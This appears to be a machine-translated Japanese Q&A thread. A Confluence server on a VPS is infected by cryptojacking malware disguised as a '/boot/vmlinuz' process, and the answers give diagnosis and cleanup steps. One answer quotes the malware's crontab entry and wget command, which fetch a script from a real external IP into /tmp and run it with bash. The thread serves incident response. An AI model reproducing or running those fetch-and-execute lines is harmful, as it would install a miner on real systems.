VPSでJiraとConfluenceインスタンス(およびnginxリバースプロキシ)を実行しています。現在、何らかの理由で合流を開始できません。これは別の結果です。
プロセスリストを確認しました。
confluence
ユーザーが/boot/vmlinuz
プロセスを実行すると、CPUを消費します。このプロセスをkill -9
すると、数秒後に再び開始されます。
VPSを再起動した後:
/boot/vmlinuz
プロセスが開始されます。自動起動からConfluenceを削除しましたが、問題ありません。
だから私の質問:
/boot/vmlinuz
プロセスとは何ですか?私はこれを見たことがない。 (はい、わかっています。vmlinuzがカーネルです)答えてくれてありがとう
ハッキングが原因です。 /tmp/seasame
ファイルが見つかった場合、サーバーが感染しています。 cronを使用してこのファイルをダウンロードします。 /tmp
フォルダー内のファイルを削除し、すべてのプロセスを強制終了し、confluenceユーザーのcronを無効にし、Confluenceを更新しました。
サーバーがハッキングされているようです。プロセスリストをよく見てください。例えば実行ps auxc
とプロセスのバイナリソースを見てください。
Rkhunterなどのツールを使用してサーバーをスキャンできますが、一般的には、最初にconfluenceユーザーとしてランチされたすべてのものを強制終了し、サーバー/アカウントをスキャンして、confluenceをアップグレードします(ほとんどの場合、ユーザーが攻撃元を特定します)。追加のアカウントなどの合流点で.
そのプロセスの内容を確認したい場合は、/ procを確認してください。 ls -la /proc/996
。そこにもソースバイナリが表示されます。ランチもできますstrace -ff -p 996
は、プロセスが実行していることを確認するか、cat /proc/996/exe | strings
バイナリの文字列を確認します。これはおそらく、ある種のボットネットパーツ、マイナーなどです。
私は同じ問題を抱えていました。ハッキングされ、ウイルススクリプトは/ tmpにあり、コマンド "top"からスクリプト名を検索し(重要ではない文字、 "fcbk6hj"の名前は私のものでした)、プロセスを終了します(おそらく3プロセス)。
ルート3158 1 0 15:18? 00:00:01 ./fcbk6hj ./jd8CKgl root 3159 1 0 15:18? 00:00:01 ./fcbk6hj ./5CDocHl root 3160 1 0 15:18? 00:00:11 ./fcbk6hj ./prot
それらすべてを殺し、/ tmp/protを削除し、CPUが戻ってきた/ boot/vmlinuzのプロセスを殺します。
ウイルスがスクリプトを/ tmpに自動的にダウンロードしたことがわかりました。私の方法は、mv wgetakを他の名前にすることでした。
ウイルスの振る舞い:wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
次のタスクがcrontabで記述されていることがわかりました、削除してください:*/5 * * * */usr/bin/wgetak -q -O/tmp/seasame http://51.38.133.232:8 && bash/tmp/seasame
これをシステムとcrontabから削除した後、(少なくとも今のところ)confluenceユーザーを/etc/cron.deny
に追加することをお勧めします。
以降:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information
ご存じのとおり、これはマルウェアです-実際には cryptojackingマルウェア であり、CPUを cryptocurrency miner として使用することを目的としています。
あなたのサーバーはConfluenceの脆弱性( このredditの投稿 の最初の回答を参照)のために侵害されている可能性が高いですが、これがであることを知っている必要があります/その伝搬方法だけではない —これは十分に強調することはできません。実際、私のサーバーもConfluenceを実行していませんが(このソフトウェアも知らないのですが)侵害されており、いわゆる/boot/vmlinuz
プロセスがroot
。
また、このマルウェアはknown_hosts
およびSSHキーを使用して SSH を介して伝播しようとするため、このサーバーからアクセスした他のコンピューターを確認する必要があります。
最後に、reddit投稿はこのマルウェアの この包括的な説明 にリンクしています。これは一読の価値があります。
注:IPのISP不正行為メールアドレスにレポートを送信することを忘れないでください。
私も同時に同じ質問に出会いました。たぶん合流バグかもしれません。私は合流プロセスを殺すだけで大丈夫です。